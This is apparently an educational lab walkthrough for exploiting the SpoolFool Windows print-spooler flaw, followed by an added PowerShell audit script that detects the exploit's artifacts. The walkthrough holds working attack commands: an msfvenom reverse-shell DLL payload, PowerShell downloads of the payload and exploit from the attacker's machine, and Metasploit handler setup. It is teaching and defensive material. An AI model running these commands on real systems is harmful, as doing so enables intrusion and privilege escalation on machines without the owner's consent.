Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability
and gain a reverse shell with escalated privileges.
Prerequisites:
● A Windows 7 machine in a virtual environment (VirtualBox)
● A Kali Linux machine in a virtual environment (VirtualBox)
● A working internet connection
● SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux
machine
- First, download the PoC created by Oliver Lyak from the GitHub link given in the prerequisites.
- Open a terminal in Kali Linux and navigate to the directory where you downloaded the SpoolFool files.
- Use the command ls to check the files available in the directory. You should see an EXE file and a pre-made DLL payload.
- Next, compromise the Windows 7 machine and gain a reverse shell. For this, you can use any method of your choice, such as Metasploit or manual exploitation. Once you have a reverse shell, check the current user's permissions by running the command whoami /user /groups
- Now, create a custom DLL using msfvenom. For this exercise, we will use the meterpreter injection as the payload. Run the command msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IP_of_kali_machine LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
- Once the DLL is generated, upload it to the Windows 7 machine. We recommend using the C:\Users\Public directory for this. Start a Python web server on the Kali machine hosting the SpoolFool.exe and reverse_64bit.dll files from the same location, then fetch them with the PowerShell cmdlet Invoke-WebRequest (alias iwr) by running the commands powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf \Users\Public\reverse.dll and powershell -c iwr http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
- Now, run the exploit by using the command SpoolFool.exe -dll reverse.dll in the command prompt on the Windows 7 machine. Before running this command, make sure to set up multi/handler in msfconsole by running the commands use multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST IP_of_kali_machine and set LPORT 9501.
- Once the exploit is executed, you will notice that a new directory has been created in %temp%\d5f5….{random name} and a reparse point has been created that writes into the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4.
- The directory should now exist and the DLL should be saved in it, indicating a successful exploit. You should also see that the directory is writable by everyone.
- Finally, start the multi/handler in msfconsole by running the command run.
- You should now have a meterpreter session on the Windows 7 machine. Run whoami /user /groups again to check the current user's permissions and confirm that the privileges have been escalated.
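The artifacts the walkthrough describes (a reparse point under %temp% pointing into the spool driver tree, a driver directory that ends up writable by everyone, and a foreign DLL dropped into it) are exactly what a defender can audit for on a Windows host. The following PowerShell script is an added example written for this page; it is not part of the original walkthrough, the SpoolFool project, or Oliver Lyak's tooling. It assumes Windows PowerShell 5.1 or later (for the LinkType/Target properties on directory objects), a local administrator session, and the driver directory path named above; the "-like '*\spool\*'" pattern and the list of broad identities it flags are assumptions for this example, not a vendor-defined rule.

```powershell
# Added audit script (example, not part of the original walkthrough).
# Assumes Windows PowerShell 5.1+ and an elevated session.
# Checks the three conditions the walkthrough says a successful SpoolFool run leaves behind.

$driverDir = Join-Path $env:SystemRoot 'System32\spool\DRIVERS\x64\4'
$findings  = @()

# 1. Reparse points (junctions or symlinks) under %TEMP% that resolve into the spool tree.
#    Normal applications have no reason to create these.
Get-ChildItem -Path $env:TEMP -Directory -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Attributes -band [IO.FileAttributes]::ReparsePoint } |
    ForEach-Object {
        # Target is an array of strings on PS 5.1+; flatten it for matching.
        $target = ($_.Target | Out-String).Trim()
        if ($target -like '*\spool\*') {   # assumed pattern for this example
            $findings += "Reparse point $($_.FullName) -> $target"
        }
    }

if (Test-Path $driverDir) {
    # 2. Over-permissive ACEs on the driver directory. The walkthrough notes the
    #    directory is left writable by Everyone after the exploit.
    $acl = Get-Acl -Path $driverDir
    foreach ($ace in $acl.Access) {
        $id = $ace.IdentityReference.Value
        $broadIdentity = $id -match 'Everyone|Authenticated Users|BUILTIN\\Users'  # assumed list
        $writeRight    = $ace.FileSystemRights.ToString() -match 'Write|Modify|FullControl'
        if ($broadIdentity -and $writeRight -and $ace.AccessControlType -eq 'Allow') {
            $findings += "Permissive ACE on ${driverDir}: $id has $($ace.FileSystemRights)"
        }
    }

    # 3. DLLs in the driver directory that are unsigned or carry an invalid signature.
    #    A payload built with msfvenom will not carry a valid Authenticode signature.
    Get-ChildItem -Path $driverDir -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            if ($sig.Status -ne 'Valid') {
                $findings += "DLL with signature status '$($sig.Status)': $($_.FullName)"
            }
        }
}
else {
    Write-Host "Driver directory $driverDir does not exist (nothing staged there)."
}

if ($findings.Count -eq 0) {
    Write-Host 'No SpoolFool-style artifacts found.'
}
else {
    Write-Warning "$($findings.Count) finding(s):"
    $findings | ForEach-Object { Write-Warning $_ }
}
```

Run the script from an elevated prompt on the Windows 7 lab machine before and after the exploit step to see the difference: before, the driver directory is either absent or carries its default ACL; after, the reparse point, the Everyone-writable ACE and the unsigned reverse.dll are all reported. The same three checks are cheap enough to schedule on production print servers, and each corresponds to a mitigation (patching the spooler, or restricting the Add Printer right that SpoolFool relies on) rather than only to a detection.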
Note: This exercise is only for educational purposes and should be carried out in a controlled
and secured lab environment.
Reference:
● VirtualBox: https://www.virtualbox.org/wiki/Downloads
● Kali Linux: https://www.kali.org/downloads/
● https://www.hackingarticles.in/windows-privilege-escalation-spoolfool/